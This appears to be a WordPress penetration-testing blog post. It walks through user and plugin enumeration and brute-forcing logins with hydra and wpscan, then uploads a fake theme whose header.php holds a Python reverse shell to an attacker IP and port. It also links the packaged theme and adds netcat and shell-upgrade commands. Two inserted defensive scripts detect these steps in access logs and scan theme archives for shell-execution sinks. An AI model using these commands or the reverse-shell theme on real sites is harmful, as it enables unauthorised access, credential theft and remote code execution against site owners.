WordPress site enumeration and pwning

The below has not been tested on many versions, so your mileage using the below tactics might well vary. (The IPs are different in some examples as the post was created and tested using 2 separate machines.)

When testing WordPress sites, one would usually follow something similar to;
- WordPress site enumeration
  - WordPress version enumeration
  - User(s) enumeration
  - Plugin & Theme enumeration
- Weak Credential auditing
- Privilege escalation of non-admin user(s)
- Obtaining shell access to server

1. WordPress site enumeration

WordPress version enumeration

There are a few methods you can try;
- Check the page source for 'generator' tags;
curl -s 192.168.56.102/wordpress/ | grep generator
- Check if the readme.html is available in the root of the WordPress installation; (readme.html will show WordPress version information at the top)
curl -s 192.168.56.102/wordpress/readme.html | grep Version
- Check the source of the login page; /wordpress-site/wp-login.php
curl -s 192.168.56.102/wordpress/wp-login.php | grep "ver="
WordPress user(s) enumeration
On default installations users can be found by checking the user IDs; with a nice one-liner using curl and grep you can do a quick enumeration of the first 5 users;
for i in $(seq 1 5); do curl -s 192.168.110.105/wordpress/?author=$i | grep '<title>'; done
Cool, 2 users enumerated.
It is actually a good idea to include the -L switch to ensure that you don't miss anything with redirects.
for i in $(seq 1 5); do curl -sL 192.168.110.105/wordpress/?author=$i | grep '<title>'; done
In WordPress installations with the 'stop-user-enumeration' plugin installed other approaches could be considered;
curl -i -sL '192.168.56.102/wordpress/?wp-comments-post&author=1' | grep '<title>'
curl -sL 192.168.56.102/wordpress/?wp-comments-post -d author=1 | grep '<title>'
In WordPress 4.7 a REST API was introduced that lists all users, which opens up other methods to view users;
curl -s http://localhost/wp-json/wp/v2/users
https://security.dxw.com/advisories/stop-user-enumeration-does-not-stop-user-enumeration/

WordPress Plugin & Theme enumeration
If you are lucky you will be able to browse the /wordpress_site/wp-content/plugins/ and the /wordpress_site/wp-content/themes/ directory and get a nice easy overview of what plugins and themes are installed, but this isn't very likely.
You could also fuzz the directories using wordlists specifically prepared for WordPress. SecLists has some great ones and has a decent CMS section, although from my tests it didn't catch the themes.
You could for instance fuzz the plugin directory and then enumerate further on found directories to get version numbers etc.
wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/CMS/wp_plugins.fuzz.txt --hc 404 192.168.56.104/wordpress/FUZZ
Another alternative is to use an nmap NSE script to do the hard work for you;
nmap -sV -p 80 192.168.56.102 --script=http-wordpress-enum.nse --script-args=http-wordpress-enum.root=/wordpress/

2. Weak WordPress credential auditing

With our found admin user in our hands, let's run a quick test login with admin:nimda as credentials to see what the form information is. We can get the nitty gritty details with Inspect Element in the browser;
With this new-found information we can quickly make a username file and fire up a quick bruteforce attack on the WordPress login page to check for weak password usage;
echo admin > users.txt && echo wpuser >> users.txt
hydra -L users.txt -P lists/500.txt -e nsr 192.168.110.105 http-post-form "/wordpress/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&testcookie=1:S=Location"
Awesome, there are our credentials (yes ch3rn.. it took me a looong time to get that hydra command sorted.. ) ;
Alternative methods (much easier lol.. but we like complicated do we not?!) ;
Enumerate users, plugins and themes;
wpscan -u http://192.168.110.105/wordpress/ -e u,ap,at
Brute forcing these enumerated users;
wpscan --users users.txt -w /root/lists/500.txt -u 192.168.110.105/wordpress/
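Every step in sections 1 and 2 leaves a distinctive trail in the web server's access log: a client walking ?author=1, 2, 3..., a hit on /wp-json/wp/v2/users, a burst of 404s under wp-content/plugins/ from wfuzz, and dozens of POSTs to wp-login.php from hydra or wpscan. The script below is an added example written for this page (it is not the author's tooling) that flags those patterns per client IP. The log lines are constructed samples in Apache combined format, the thresholds are assumptions, and it goes slightly beyond the post by also catching the ?wp-comments-post&author=N variant and the ?rest_route=/wp/v2/users form of the REST call.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlparse

# Apache/nginx "combined" log format; only the fields we use are captured.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# Thresholds are assumptions for this demo; tune them to the site's normal traffic.
AUTHOR_ID_SWEEP = 3    # distinct ?author=N values seen from one client
PLUGIN_404_BURST = 10  # 404s under wp-content/plugins|themes from one client
LOGIN_POST_BURST = 10  # POSTs to wp-login.php from one client


def _line(ip, method, target, status, ua):
    """Build one constructed combined-format log line (sample data only)."""
    return f'{ip} - - [10/Jan/2018:10:00:00 +0000] "{method} {target} HTTP/1.1" {status} 512 "-" "{ua}"'


def sample_log():
    """Constructed traffic: one client repeating the post's enumeration and
    brute-force steps (192.168.110.101, as in the post), one ordinary visitor."""
    atk, vis = "192.168.110.101", "10.0.0.5"
    lines = [_line(atk, "GET", f"/wordpress/?author={i}", 301 if i < 3 else 404, "curl/7.58.0")
             for i in range(1, 6)]
    lines.append(_line(atk, "GET", "/wordpress/?wp-comments-post&author=1", 301, "curl/7.58.0"))
    lines.append(_line(atk, "GET", "/wp-json/wp/v2/users", 200, "curl/7.58.0"))
    lines += [_line(atk, "GET", f"/wordpress/wp-content/plugins/guess{i}/", 404, "Wfuzz/2.2")
              for i in range(12)]
    lines += [_line(atk, "POST", "/wordpress/wp-login.php", 200, "Mozilla/5.0 (Hydra)")
              for _ in range(30)]
    lines.append(_line(vis, "GET", "/wordpress/", 200, "Mozilla/5.0"))
    lines.append(_line(vis, "GET", "/wordpress/?author=1", 301, "Mozilla/5.0"))
    lines.append(_line(vis, "POST", "/wordpress/wp-login.php", 302, "Mozilla/5.0"))
    return "\n".join(lines)


def parse(log_text):
    """Yield one dict per well-formed log line; malformed lines are skipped."""
    for raw in log_text.splitlines():
        m = LOG_RE.match(raw)
        if m:
            yield m.groupdict()


def analyze(log_text):
    """Return {client_ip: [finding, ...]} for clients showing the patterns above."""
    author_ids, rest_users = defaultdict(set), defaultdict(int)
    plugin_404, login_posts = defaultdict(int), defaultdict(int)
    for r in parse(log_text):
        ip, url = r["ip"], urlparse(r["target"])
        query = parse_qs(url.query)
        # ?author=N sweeps, including the ?wp-comments-post&author=N variant
        for val in query.get("author", []):
            author_ids[ip].add(val)
        # REST user listing via pretty permalink or the ?rest_route= fallback
        route = query.get("rest_route", [""])[0].rstrip("/")
        if url.path.rstrip("/").endswith("/wp-json/wp/v2/users") or route.endswith("/wp/v2/users"):
            rest_users[ip] += 1
        # plugin/theme directory fuzzing shows up as a burst of 404s
        if r["status"] == "404" and re.search(r"/wp-content/(plugins|themes)/", url.path):
            plugin_404[ip] += 1
        # password guessing is a burst of POSTs to the login form
        if r["method"] == "POST" and url.path.endswith("/wp-login.php"):
            login_posts[ip] += 1

    findings = defaultdict(list)
    for ip, ids in author_ids.items():
        if len(ids) >= AUTHOR_ID_SWEEP:
            findings[ip].append(f"author-id enumeration ({len(ids)} distinct ids)")
    for ip, n in rest_users.items():
        findings[ip].append(f"REST user listing requested ({n}x)")
    for ip, n in plugin_404.items():
        if n >= PLUGIN_404_BURST:
            findings[ip].append(f"plugin/theme directory fuzzing ({n} 404s)")
    for ip, n in login_posts.items():
        if n >= LOGIN_POST_BURST:
            findings[ip].append(f"wp-login.php brute force ({n} POSTs)")
    return dict(findings)


if __name__ == "__main__":
    for ip, notes in analyze(sample_log()).items():
        print(ip)
        for note in notes:
            print("  -", note)
```

Run against a real combined-format log (pipe the file into `analyze`) the visitor with a single ?author=1 redirect and one login stays quiet, while the curl/wfuzz/hydra client trips all four rules. The REST rule fires on a single request on purpose: on a site that does not expose public author profiles, nobody legitimate asks for that listing.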
3. Privilege escalation of non-admin user(s)
If you weren't lucky enough to get admin credentials, there may still be a way to escalate a lesser privileged user to admin privileges. This is where the plugin and theme enumeration comes in; WordPress itself does not often appear to have privilege escalation vulnerabilities of this nature, but plugins and themes occasionally do.
Doing a quick searchsploit of wordpress escalation exploits gives a few responses, and this route is worth a quick check with the enumerated plugins and themes.
searchsploit wordpress escalation
Failing this, the enumerated plugins and themes should always be checked for exploits, which can range from information disclosure to unauthenticated LFI / RFI / RCE.

4. Obtaining shell access to server

With our nice new shiny admin creds, we head over to the WordPress Dashboard as admin, and get access to themes and plugins and the ability to install new ones.. ooohh yeah..
If you are admin, you can create a fake plugin with a reverse shell so that on activation of the plugin, shell can be obtained. You can also edit the 'header.php' file of the active Theme into a reverse shell so that on refreshing of the site, reverse shell is obtained. The drawback is that this means you have to make a semi-permanent change to files and it can cause issues when trying to get back to the site, so I have been looking at alternative ways, but possible methods include;
- Editing the main header.php script of the WordPress site to contain a reverse shell.
- Uploading a fake plugin containing a reverse shell.
- Uploading a fake theme containing a reverse shell.

WordPress Themes

It is trivial to actually create your own fake theme including a reverse shell, upload and have a shell spawned by using the Live Preview only. This means there are no changes made to any files and a nice clean way to get a reverse shell. So what do we need..
First to see which files are required to create a WordPress theme;
https://developer.wordpress.org/themes/release/required-theme-files/
I also included a header.php file which is called by index.php; the header.php is where the php reverse shell is. (The IP and PORT need to be changed to suit your setup.)
So we need to create these files, bundle into a folder and zip it up to create the WP theme.
This is the content of my fake-theme zip file;

STYLE.CSS
/*
Theme Name: FAKE WordPress Theme
Description: A theme to be installed to allow execution of a shell using Theme Live Preview.
License: Ours Not Yours
License URI: Ours
Tags: edit IP and PORT in header.php as required, run netcat listener, click on live preview, check for shell
Text Domain: fake-theme
*/

INDEX.PHP
<?php get_header(); ?>

COMMENTS.PHP
I actually left this completely blank, possibly could have placed reverse shell code here and have the index.php call comments.php instead of header.php.. I'm not sure..

HEADER.PHP
<?php echo shell_exec(`python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.110.101",31337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'`);?>

SCREENSHOT.PNG
I decided to make a .png file which is shown in the wordpress Theme page, just so you know which one to click on
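The whole fake-theme trick works because WordPress will install and Live Preview any archive an administrator uploads, and the only thing that distinguishes this theme from a real one is the shell_exec call with a backtick command inside header.php. The script below is an added example written for this page, not the author's code: it builds two constructed theme archives in memory (the post's fake-theme layout with the reverse-shell command replaced by a placeholder, and a benign theme) and scans the PHP members for code-execution sinks, the kind of check a defender would run on uploaded theme or plugin archives before they reach a server. File names inside the archives and the pattern list are assumptions for the demo.

```python
import io
import re
import zipfile

# PHP constructs a legitimate theme has no reason to contain. Backticks are
# PHP's shell-execution operator, which is what the post's header.php uses.
SINK_PATTERNS = {
    r"\b(shell_exec|exec|system|passthru|popen|proc_open)\s*\(": "shell execution",
    r"`[^`]+`": "backtick shell execution",
    r"\beval\s*\(": "eval",
    r"\b(base64_decode|gzinflate|str_rot13)\s*\(": "obfuscation helper",
    r"\$_(GET|POST|REQUEST|COOKIE)\s*\[[^\]]*\]\s*\(": "request-controlled function call",
    r"\bfsockopen\s*\(": "raw socket",
}
COMPILED = [(re.compile(p), desc) for p, desc in SINK_PATTERNS.items()]
PHP_SUFFIXES = (".php", ".phtml", ".inc")


def make_zip(files):
    """Build an in-memory zip from {member_name: content} (constructed data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        for name, content in files.items():
            zf.writestr(name, content)
    return buf.getvalue()


def sample_archives():
    """Two constructed theme archives: the post's fake-theme layout with the
    reverse-shell command replaced by a placeholder, and a benign theme."""
    fake = make_zip({
        "fake-theme/style.css": "/*\nTheme Name: FAKE WordPress Theme\nText Domain: fake-theme\n*/\n",
        "fake-theme/index.php": "<?php get_header(); ?>\n",
        "fake-theme/comments.php": "",
        "fake-theme/header.php": "<?php echo shell_exec(`PLACEHOLDER_COMMAND`); ?>\n",
        "fake-theme/screenshot.png": b"\x89PNG placeholder bytes",
    })
    good = make_zip({
        "good-theme/style.css": "/*\nTheme Name: Good Theme\nText Domain: good-theme\n*/\n",
        "good-theme/index.php": "<?php get_header(); ?>\n<main><?php the_content(); ?></main>\n",
        "good-theme/header.php": "<!DOCTYPE html>\n<html <?php language_attributes(); ?>>\n<head><?php wp_head(); ?></head>\n",
        "good-theme/functions.php": "<?php\nfunction good_theme_setup() { add_theme_support('title-tag'); }\nadd_action('after_setup_theme', 'good_theme_setup');\n",
    })
    return fake, good


def scan_archive(zip_bytes):
    """Return [(member, line_no, description, snippet), ...] for every sink
    pattern found in a PHP member; an empty list means nothing was found."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir() or not info.filename.lower().endswith(PHP_SUFFIXES):
                continue
            text = zf.read(info).decode("utf-8", errors="replace")
            for line_no, line in enumerate(text.splitlines(), 1):
                for rx, desc in COMPILED:
                    if rx.search(line):
                        hits.append((info.filename, line_no, desc, line.strip()[:80]))
    return hits


if __name__ == "__main__":
    fake, good = sample_archives()
    for label, archive in (("fake-theme.zip", fake), ("good-theme.zip", good)):
        hits = scan_archive(archive)
        print(f"{label}: {len(hits)} finding(s)")
        for member, line_no, desc, snippet in hits:
            print(f"  {member}:{line_no} [{desc}] {snippet}")
```

The benign theme produces no findings; the fake one is flagged twice on header.php line 1, once for shell_exec and once for the backtick command. The backtick pattern is deliberately crude and will also match backticks inside PHP strings or comments, so treat the output as triage, not a verdict. On sites where nobody should be uploading themes at all, defining DISALLOW_FILE_MODS in wp-config.php removes the install and Live Preview upload path (and the theme editor) entirely.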
Nice and subtle yeah? So, when you bundle all those files in a directory, zip it up and upload to Themes in the WordPress Dashboard, you can start your netcat listener on your attacking machine, click on the theme and choose Live Preview to get your shell.
fake-theme file for those interested;
http://www.mediafire.com/file/ya0qn83o0b5e3lu/fake-theme.zip
So, now when we log into the WordPress site as admin and head over to the Dashboard and the theme section, we can install this beautiful new fake theme.
After installation and viewing the Themes again we see the following;
Now when we click on the fake theme, we are presented with some information, can activate, do a Live Preview or delete.
The Live Preview won't activate it, but it will run it as a preview, and as a consequence run the php reverse shell, yeah baby..
Of course we also spawn a nicer shell and set the environment for ease of use;
python -c 'import pty; pty.spawn("/bin/bash")'
Now we can continue on our quest to root, knowing that we have not damaged or altered the server (VM) and can use that same method to gain shell access again with ease.
As the theme is now installed, you can also access/load the reverse shell using curl from your attacking machine should the browser Live Preview method be giving you any grief.
Start listener;
nc -lvp 31337
Access/load the reverse shell located in header.php with curl;
curl 192.168.56.102/wordpress/wp-content/themes/fake-theme/header.php
Hope the above is of some interest to you guys & gals!